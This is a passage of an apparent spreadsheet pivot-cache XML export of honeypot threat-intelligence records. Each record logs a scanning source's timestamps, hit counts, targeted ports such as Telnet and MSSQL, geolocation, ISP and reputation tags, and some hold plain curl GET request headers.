    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H21&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;6530&amp;&amp;23&amp;&amp;29228&amp;&amp;42305&amp;&amp;42281&amp;&amp;9100&amp;&amp;80"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7de4:b940"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3499"/>
    <x v="3499"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T19:27:42"/>
    <d v="2025-04-02T19:27:42"/>
    <d v="2025-04-02T19:27:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Mayiladuthurai"/>
    <s v="Sīrkāzhi"/>
    <s v="1256075"/>
    <s v="NA"/>
    <s v="11.2373"/>
    <s v="79.7358"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:5d38"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3500"/>
    <x v="3500"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T19:27:00"/>
    <d v="2025-04-02T19:27:00"/>
    <d v="2025-04-02T19:27:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kartal"/>
    <s v="Pendik"/>
    <s v="740616"/>
    <s v="NA"/>
    <s v="40.8994"/>
    <s v="29.2108"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b05b:a74a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3501"/>
    <x v="3501"/>
    <s v="host-82-51-54-187.retail.telecomitalia.it"/>
    <x v="0"/>
    <d v="2025-04-02T19:12:43"/>
    <d v="2025-04-01T10:50:59"/>
    <d v="2025-04-02T19:12:43"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="25"/>
    <s v="Lombardy"/>
    <s v="Milan"/>
    <s v="Milan"/>
    <s v="3173435"/>
    <s v="20121"/>
    <s v="45.4642"/>
    <s v="9.18998"/>
    <s v="3269"/>
    <s v="Telecom Italia S.p.A."/>
    <s v="Telecom Italia S.p.A. TIN EASY LITE"/>
    <s v="residential"/>
    <s v="INTERBUSINESS"/>
    <s v="2003-08-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1996-01-29 00:00:00"/>
    <s v="2026-01-29 00:00:00"/>
    <s v="2025-02-14 00:53:45"/>
    <s v="ns.telecomitalia.it_x000a_  dnsts.interbusiness.it"/>
    <s v="Telecom Italia s.p.a."/>
    <s v="ok"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5233:36bb"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3502"/>
    <x v="3502"/>
    <s v="220-133-60-228.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T19:10:03"/>
    <d v="2023-07-30T03:19:58"/>
    <d v="2025-04-02T19:10:03"/>
    <n v="598"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;114&amp;&amp;23&amp;&amp;80&amp;&amp;9100"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc85:3ce4"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3503"/>
    <x v="3503"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T19:00:51"/>
    <d v="2025-04-02T19:00:51"/>
    <d v="2025-04-02T19:00:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:a2c6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3504"/>
    <x v="3504"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T18:54:58"/>
    <d v="2024-04-13T06:39:54"/>
    <d v="2025-04-02T18:54:58"/>
    <n v="138"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_HTTP_H41&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;80&amp;&amp;34056&amp;&amp;80&amp;&amp;47482&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MP"/>
    <s v="Madhya Pradesh"/>
    <s v="Indore"/>
    <s v="Indore (Vijay Nagar)"/>
    <s v="1269743"/>
    <s v="452010"/>
    <s v="22.7554"/>
    <s v="75.886"/>
    <s v="132445"/>
    <s v="Khetan Cable Network Pvt. Limited"/>
    <s v="Khetan Cable Network Pvt. Limited"/>
    <s v="residential"/>
    <s v="Khetan4"/>
    <s v="2012-10-04"/>
    <s v="KHETAN-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6715:37ba"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3505"/>
    <x v="3505"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T18:51:04"/>
    <d v="2025-03-12T12:46:55"/>
    <d v="2025-04-02T18:51:04"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTP_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="37215&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="AN"/>
    <s v="Andalusia"/>
    <s v="Cadiz"/>
    <s v="Cadiz"/>
    <s v="2520600"/>
    <s v="11002"/>
    <s v="36.5267"/>
    <s v="-6.2891"/>
    <s v="60987"/>
    <s v="FIBERDAN NETWORKS, S.L"/>
    <s v="FIBERDAN NETWORKS, S.L"/>
    <s v="residential"/>
    <s v="FIBERDAN NETWORKS, S.L"/>
    <s v="2017-04-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;POST"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9c6:ba15"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3506"/>
    <x v="3506"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T18:48:12"/>
    <d v="2025-04-02T18:48:12"/>
    <d v="2025-04-02T18:48:12"/>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d:913f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3507"/>
    <x v="3507"/>
    <s v="NA&amp;&amp;118-163-142-112.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T18:41:54"/>
    <d v="2024-08-14T09:15:45"/>
    <d v="2025-04-02T18:41:54"/>
    <n v="351"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;52528&amp;&amp;23&amp;&amp;20851&amp;&amp;48673&amp;&amp;9100&amp;&amp;80"/>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2007-10-04"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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76a3:8e70"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3508"/>
    <x v="3508"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T18:22:03"/>
    <d v="2025-03-16T08:28:45"/>
    <d v="2025-04-02T18:22:03"/>
    <n v="48"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H20&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="44477"/>
    <s v="STARK INDUSTRIES SOLUTIONS LTD"/>
    <s v="Stark Industries Solutions LTD"/>
    <s v="hosting"/>
    <s v="Adcdata Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b94a:deaf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3509"/>
    <x v="3509"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T18:12:37"/>
    <d v="2025-04-02T18:12:37"/>
    <d v="2025-04-02T18:12:37"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5f:cf85"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3510"/>
    <x v="3510"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T18:03:03"/>
    <d v="2025-04-02T18:03:03"/>
    <d v="2025-04-02T18:03:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b05:d0eb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3511"/>
    <x v="3511"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T18:01:56"/>
    <d v="2025-04-02T18:01:56"/>
    <d v="2025-04-02T18:01:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata"/>
    <s v="1275004"/>
    <s v="NA"/>
    <s v="22.5626"/>
    <s v="88.363"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7360:6f65"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3512"/>
    <x v="3512"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T17:58:55"/>
    <d v="2025-04-02T17:58:55"/>
    <d v="2025-04-02T17:58:55"/>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d9:dadc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3513"/>
    <x v="3513"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T17:55:22"/>
    <d v="2025-04-02T17:55:22"/>
    <d v="2025-04-02T17:55:22"/>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3:d59d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3514"/>
    <x v="3514"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T17:45:08"/>
    <d v="2025-04-02T17:45:08"/>
    <d v="2025-04-02T17:45:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:fc98"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3515"/>
    <x v="3515"/>
    <s v="123-195-177-68.dynamic.kbronet.com.tw&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T17:41:55"/>
    <d v="2024-09-11T05:20:00"/>
    <d v="2025-04-02T17:41:55"/>
    <n v="247"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
